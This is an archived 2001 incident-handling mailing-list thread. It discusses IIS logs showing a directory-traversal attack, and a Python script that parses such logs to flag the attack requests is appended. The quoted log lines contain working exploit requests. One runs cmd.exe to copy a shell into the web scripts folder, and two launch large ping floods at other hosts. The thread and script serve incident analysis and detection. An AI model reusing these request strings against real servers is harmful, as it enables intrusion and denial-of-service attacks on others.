Re: Subject: Unicode Logs with Ping Activity

From: gattacaat_private
Date: Tue Jul 10 2001 - 11:56:05 PDT


    It would appear that your IIS webserver is not patched. Sorry I'm not sure 
    of the correct "hotfix" but you can find them at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/current.asp 
    and select "IIS"
    
    502 Bad Gateway 
    "The server, in the role of a gateway or proxy, received an invalid response 
    from the upstream server while attempting to fulfill the request."
    
    http://www.liquidmatrix.org/HTTPsc.htm
    
    hope this helps somewhat,
    gattaca
    
    ----------------------
    liquidmatrix.Org
    ----------------------
    
    ------------------------------------------------------------------------------
    From: myrddin_eat_private 
    Date: Tue, 10 Jul 2001 08:24:50 -0800 (PDT) 
    To: incidentsat_private 
    Subject: Unicode Logs with Ping Activity 
    
    
    Would like someone to help me understand what is going on here... The 502 
    error at the end of these entries would indicate failures, wouldn't 
    they? I've been all through the logs on this box, and even though every 
    attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    shows a 502, it is there.
    
    
    I'm looking at the times on the log entries and guessing that this was a 
    manual attack.
    
    
    Also, can someone please explain what is being attempted with these pings?
    aaa.aaa.aaa.aaa
    bbb.bbb.bbb.bbb
    ccc.ccc.ccc.ccc.ccc
    ddd.ddd.ddd.ddd.ddd 
    are all unique addresses.
    
    
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2001-06-19 18:44:15
    #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) 
    2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -
    
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    ----------------------------------------------------------------------------
    
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com 
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:20 PDT
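
A triage sketch for the log quoted in this thread, added here as an example and not part of either poster's message: it reads the W3C extended log through its #Fields line, flags traversal and cmd.exe requests whatever sc-status says (the original poster reports that shell.exe was present despite the 502), decodes each query into the command it carried, and records files written by `copy`. The function names, the extra /default.htm entry and its eee.eee.eee.eee address are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the header and three entries quoted in the post, rejoined
# onto single lines, plus one ordinary request added here for contrast.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -
2001-06-19 19:40:00 eee.eee.eee.eee - bbb.bbb.bbb.bbb 80 GET /default.htm - 200 -
"""

SHELL_RE = re.compile(r"(^|/)cmd\.exe$", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def find_command_requests(text):
    """Flag traversal/shell requests whatever sc-status says, and track copies."""
    hits, dropped = [], set()   # dropped: basenames of files written by 'copy'
    for e in parse_w3c(text):
        stem = e["cs-uri-stem"].replace("\\", "/").lower()
        parts = stem.split("/")
        if ".." in parts or SHELL_RE.search(stem) or parts[-1] in dropped:
            argv = unquote_plus(e["cs-uri-query"]).split()
            if len(argv) >= 4 and argv[1].lower() == "copy":
                dropped.add(argv[3].replace("\\", "/").lower().split("/")[-1])
            hits.append({"when": e["date"] + " " + e["time"], "client": e["c-ip"],
                         "status": e["sc-status"], "command": " ".join(argv[1:])})
    return hits, sorted(dropped)

if __name__ == "__main__":
    hits, dropped = find_command_requests(SAMPLE_LOG)
    for h in hits:
        print(h["when"], h["client"], h["status"], h["command"])
    print("files to look for on disk and in later requests:", dropped)
```

The second return value lists copy destinations to check on disk and to watch for as URI stems in later log entries.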